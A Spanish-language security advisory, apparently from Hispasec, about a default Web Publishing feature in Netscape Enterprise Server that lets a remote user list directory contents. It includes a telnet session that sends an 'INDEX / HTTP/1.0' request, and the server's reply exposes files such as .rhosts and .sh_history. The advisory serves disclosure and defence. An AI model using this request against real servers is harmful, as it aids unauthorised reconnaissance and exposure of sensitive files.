Netscape Enterprise Server es un servidor web que se emplea comúnmente
en grandes corporaciones y entornos de grandes requisitos. Existe una
característica que se instala por defecto que puede permitir a un
atacante obtener el listado de archivos de un directorio.
El servidor web de Netscape incluye la característica Web Publishing
(Publicación Web) que se instala y habilita por defecto al realizar la
instalación de la aplicación. Si esta opción se encuentra activada
un usuario remoto podrá lograr visualizar los contenidos de cualquier
directorio del web.
Si el atacante se conecta por telnet al puerto por el que opera Netscape
Enterprise Server y realiza la petición «INDEX / HTTP/1.0» provocará que
el servidor muestre un listado completo del contenido del directorio
especificado. De la siguiente forma:
Trying 192.168.1.1…
Connected to http://www.example.org.
Escape character is `^]´.
INDEX / HTTP/1.0
HTTP/1.1 200 OK
Server: Netscape-Enterprise/3.6 SP2
Date: Fri, 19 Jan 2001 12:37:26 GMT
Content-type: text/plain
test directory 512 979859452 0 null null
images directory 512 979701766 0 null null
index.html text/html 1467 979701461 268 null null
mobile directory 512 979701775 0 null null
admin directory 512 979701801 0 null null
.rhosts unknown 22 965727716 264 null null
search directory 512 931316908 0 null null
.sh_history unknown 1256 979723453 264 null null
corporate directory 512 972989267 0 null null
.cshrc unknown 418 975657629 264 null null
.login unknown 674 975657629 264 null null
Si esta vulnerabilidad se logra explotar con éxito podrá facilitar al
atacante la obtención de información sensible y posibilitar el
realizar un ataque mucho más elaborado.
antonior@hispasec.com
Más información:
Securityfocus
http://www.securityfocus.com/vdb/bottom.html?vid=2285
Bugtraq
http://www.securityfocus.com/archive/1/158099
Deja una respuesta